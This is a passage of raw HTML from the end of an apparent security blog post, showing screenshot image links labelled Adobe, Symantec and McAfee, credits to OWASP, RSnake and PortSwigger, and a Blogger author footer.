<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyjtf4-ZcBbJAFiIL_3Y3-mPWyOWLoRNbocajOT-6gGR8QEen2fuM26W8PeoQpJAKbq_4kOx2B4VK0O0_TXXCtOwqSF3frdbBPotTAgIF8HlKBcx8aO31ZD3mF10gKaqjcacQO1igmUPg/s1600/Adobe.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyjtf4-ZcBbJAFiIL_3Y3-mPWyOWLoRNbocajOT-6gGR8QEen2fuM26W8PeoQpJAKbq_4kOx2B4VK0O0_TXXCtOwqSF3frdbBPotTAgIF8HlKBcx8aO31ZD3mF10gKaqjcacQO1igmUPg/s320/Adobe.PNG" height="240" width="320" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><br /></span></div>
<span style="font-family: Verdana,sans-serif;"> </span><br />
<span style="font-family: Verdana,sans-serif;"> <b>Symantec</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwdln9muPceV9ciAFZXUMeYCTvLlCDStuRHfCYzqIakW6g2JuyRbGSCpyMLC5leKI7WgjgBhkjNT99LwEYYwkHYemZ03SgH-agn1V-NA0DvfVDTed0lRgkYtfAasXNoj4NRtDVnSpk7iI/s1600/symantec.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwdln9muPceV9ciAFZXUMeYCTvLlCDStuRHfCYzqIakW6g2JuyRbGSCpyMLC5leKI7WgjgBhkjNT99LwEYYwkHYemZ03SgH-agn1V-NA0DvfVDTed0lRgkYtfAasXNoj4NRtDVnSpk7iI/s320/symantec.PNG" height="240" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"> <b>Mcafee</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcmeogs0whozfFKv5HzAx-3rpx9kCGKO8MTQWlS0xNh855mmqS23Nzv1F9_AhYuZh4wSbru2F4FXzBBM6rJ46U0gS7ffjFLO8nSC3IwpgaaOe__Lvejt4R1kIl-PZ7O4KwHTtuqAiZcfQ/s1600/Mcafee.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcmeogs0whozfFKv5HzAx-3rpx9kCGKO8MTQWlS0xNh855mmqS23Nzv1F9_AhYuZh4wSbru2F4FXzBBM6rJ46U0gS7ffjFLO8nSC3IwpgaaOe__Lvejt4R1kIl-PZ7O4KwHTtuqAiZcfQ/s320/Mcafee.PNG" height="240" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Post credits: OWASP, RSnake, PortSwigger</span><br />
<span style="font-family: Verdana,sans-serif;">Title credit: <a href="http://www.imdb.com/title/tt2077833/" target="_blank">Rowdy Rathore</a> (2012)</span></div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0